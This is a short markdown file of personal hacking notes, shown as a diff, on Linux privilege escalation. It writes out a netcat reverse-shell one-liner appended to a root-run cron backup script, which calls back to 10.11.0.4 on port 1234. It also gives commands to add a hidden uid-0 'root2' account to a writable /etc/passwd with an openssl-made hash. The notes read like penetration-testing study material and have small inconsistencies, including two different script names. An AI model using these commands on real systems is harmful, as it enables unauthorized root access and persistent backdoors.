Anonymvs17/hacking/notes/priviledgeEscalation.md

 * Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell one-liner ``echo >> user_backup.sh`` && ``echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f" >> user_backups.sh``
 * Open nc reverese shell in kali => and once this CJ runs we should have root acccess shell

+## Insecure File Permissions: /etc/passwd Case Study
+Linux passwords are generally stored in `/etc/shadow`, which is not readable by normal users.
+Historically however, password hashes, along with other account information, were stored in the world-readable file `/etc/passwd`

+* `/etc/passwd` if available is firstly taken over `/etc/shadow`
+* if availabe, can create a pw in hash `openssl passwd evil` generate typically something like `AK24fcSx2Il3I`
+* put root 2 users into `etc/passwd` => `echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd`
+* then you might login as this user: `su root2`

 ## Exploiting services which are running as root
 *Exploiting any service which is running as root will give you Root!* Example MySQL